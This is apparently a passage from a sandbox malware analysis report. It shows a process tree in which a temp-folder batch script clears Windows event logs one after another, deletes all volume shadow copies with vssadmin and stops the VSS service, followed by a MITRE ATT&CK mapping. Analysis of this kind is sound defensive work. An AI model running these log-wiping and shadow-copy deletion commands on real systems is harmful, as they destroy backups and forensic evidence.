    WEVTUTIL CL "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
    3⤵
    PID:856
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PeopleNearMe/Operational"
    3⤵
    PID:1764
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
    3⤵
    PID:1212
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
    3⤵
    PID:2028
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerCfg/Diagnostic"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerCpl/Diagnostic"
    3⤵
    PID:224
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
    3⤵
    PID:2724
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerShell/Analytic"
    3⤵
    PID:1964
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PowerShell/Operational"
    3⤵
    PID:220
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrimaryNetworkIcon/Performance"
    3⤵
    PID:3048
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrintService/Admin"
    3⤵
    PID:2752
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrintService/Debug"
    3⤵
    PID:2116
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-PrintService/Operational"
    3⤵
    PID:3068
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
    3⤵
    PID:2620
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-QoS-Pacer/Diagnostic"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-QoS-qWAVE/Debug"
    3⤵
    PID:2720
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RPC-Proxy/Debug"
    3⤵
    PID:2532
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RPC/Debug"
    3⤵
    PID:1444
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RPC/EEInfo"
    3⤵
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Analytic"
    3⤵
    PID:1816
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReadyBoost/Operational"
    3⤵
    PID:2784
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Analytic"
    3⤵
    PID:2796
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Operational"
    3⤵
    PID:1752
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Recovery/Operational"
    3⤵
    PID:2000
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
    3⤵
    PID:1600
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
    3⤵
    PID:1952
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Admin"
    3⤵
    PID:1504
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Operational"
    3⤵
    PID:1736
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Tracing"
    3⤵
    PID:724
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
    3⤵
    PID:2184
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
    3⤵
    PID:2724
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
    3⤵
    PID:2828
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
    3⤵
    PID:2588
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ResourcePublication/Tracing"
    3⤵
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-RestartManager/Operational"
    3⤵
    PID:1660
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Search-Core/Diagnostic"
    3⤵
    PID:2116
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
    3⤵
    PID:2684
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
    3⤵
    PID:2780
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
    3⤵
    PID:3024
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-IdentityListener/Operational"
    3⤵
    PID:1572
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Security-SPP/Perf"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sens/Debug"
    3⤵
    PID:1444
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ServiceReportingApi/Debug"
    3⤵
    PID:2696
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Services-Svchost/Diagnostic"
    3⤵
    PID:1616
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Services/Diagnostic"
    3⤵
    PID:2892
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Setup/Analytic"
    3⤵
    PID:2652
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SetupCl/Analytic"
    3⤵
    PID:1148
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SetupQueue/Analytic"
    3⤵
    PID:2888
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SetupUGC/Analytic"
    3⤵
    PID:2208
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
    3⤵
    PID:544
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
    3⤵
    PID:1124
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
    3⤵
    PID:2484
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
    3⤵
    PID:852
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
    3⤵
    PID:1716
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
    3⤵
    PID:1764
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
    3⤵
    PID:724
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-Core/Diagnostic"
    3⤵
    PID:1408
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
    3⤵
    PID:288
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-Shwebsvc"
    3⤵
    PID:584
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
    3⤵
    PID:2724
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shsvcs/Diagnostic"
    3⤵
    PID:2828
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sidebar/Diagnostic"
    3⤵
    PID:1372
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Speech-UserExperience/Diagnostic"
    3⤵
    PID:2216
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Spell-Checking/Analytic"
    3⤵
    - Clears Windows event logs
    PID:280
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SpellChecker/Analytic"
    3⤵
    PID:3060
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StickyNotes/Admin"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StickyNotes/Debug"
    3⤵
    PID:2720
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StickyNotes/Diagnostic"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorDiag/Operational"
    3⤵
    PID:1824
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorPort/Operational"
    3⤵
    PID:2744
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Subsys-Csr/Operational"
    3⤵
    PID:1504
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Subsys-SMSS/Operational"
    3⤵
    PID:2716
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Superfetch/Main"
    3⤵
    PID:584
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Superfetch/StoreLog"
    3⤵
    PID:3060
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sysprep/Analytic"
    3⤵
    PID:2952
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SystemHealthAgent/Diagnostic"
    3⤵
    PID:1716
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TCPIP/Diagnostic"
    3⤵
    PID:1512
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "c:\windows\temp\bmikepfqm.bat"
  2⤵
  PID:2196
- - C:\Windows\system32\sc.exe
    sc start vss
    3⤵
    PID:1372
- - C:\Windows\system32\timeout.exe
    timeout /T 5
    3⤵
    - Delays execution with timeout.exe
    PID:2596
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    PID:2236
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    PID:1832
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2652
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:708
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    PID:1876
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    PID:908
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2816
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2772
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    PID:960
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded
    3⤵
    PID:1828
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    PID:2728
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=unbounded
    3⤵
    PID:2072
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2716
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=unbounded
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2652
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    PID:2120
- - C:\Windows\System32\vssadmin.exe
    C:\Windows\System32\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    PID:544
- - C:\Windows\SysWOW64\vssadmin.exe
    C:\Windows\SysWOW64\vssadmin.exe Delete Shadows /all /quiet
    3⤵
    PID:1952
- - C:\Windows\system32\sc.exe
    sc stop VSS
    3⤵
    PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c WEVTUTIL EL
    3⤵
    PID:1560
  - - C:\Windows\system32\wevtutil.exe
      WEVTUTIL EL
      4⤵
      PID:2028
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Analytic"
    3⤵
    PID:1760
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Application"
    3⤵
    PID:224
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "DebugChannel"
    3⤵
    PID:288
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "DirectShowFilterGraph"
    3⤵
    PID:2560
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "DirectShowPluginControl"
    3⤵
    PID:2176
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Els_Hyphenation/Analytic"
    3⤵
    PID:2600
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "EndpointMapper"
    3⤵
    PID:2508
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "ForwardedEvents"
    3⤵
    PID:2372
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "HardwareEvents"
    3⤵
    PID:3012
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Internet Explorer"
    3⤵
    PID:2684
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Key Management Service"
    3⤵
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MF_MediaFoundationDeviceProxy"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Media Center"
    3⤵
    PID:1416
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MediaFoundationDeviceProxy"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPerformance"
    3⤵
    PID:2432
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPipeline"
    3⤵
    PID:788
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "MediaFoundationPlatform"
    3⤵
    PID:2784
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-IE/Diagnostic"
    3⤵
    PID:2668
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-IEDVTOOL/Diagnostic"
    3⤵
    PID:2152
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-IEFRAME/Diagnostic"
    3⤵
    PID:2944
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    PID:324
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    PID:2200
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    PID:2208
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ADSI/Debug"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-API-Tracing/Operational"
    3⤵
    PID:1124
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ATAPort/General"
    3⤵
    PID:2876
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    PID:2580
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    PID:2280
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AltTab/Diagnostic"
    3⤵
    PID:2744
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppID/Operational"
    3⤵
    PID:1760
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:2908
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    PID:2868
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:2932
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:448
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:2504
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:2384
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
    3⤵
    PID:916
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    PID:2372
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:996
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
    3⤵
    PID:156
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    - Clears Windows event logs
    PID:1368
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:2252
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:2696
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audio/Performance"
    3⤵
    PID:2524
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:2956
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:2668
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Backup"
    3⤵
    PID:1148
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:2888
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    PID:2340
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:2472
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:2132
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:2824
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:992
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:1500
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:240
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:1456
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:288
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:2788
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:2320
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:2964
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:2488
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Calculator/Debug"
    3⤵
    PID:2960
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Calculator/Diagnostic"
    3⤵
    PID:2216
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:868
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:2776
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:2604
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:860
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:648
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:2008
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:2236
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:2016
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:2356
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    PID:1308
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:332
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DCLocator/Debug"
    3⤵
    PID:796
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:2228
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:1600
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DXGI/Analytic"
    3⤵
    PID:1952
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DXGI/Logging"
    3⤵
    PID:1504
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DXP/Analytic"
    3⤵
    PID:880
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    PID:2028
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:240
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:708
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    PID:224
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:2320
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:2712
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:968
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    PID:3068
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:2748
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DhcpNap/Admin"
    3⤵
    PID:1500
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DhcpNap/Operational"
    3⤵
    PID:968
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:2936
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    PID:2872
- - C:\Windows\system32\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:2604

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1744

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2744

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:208

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

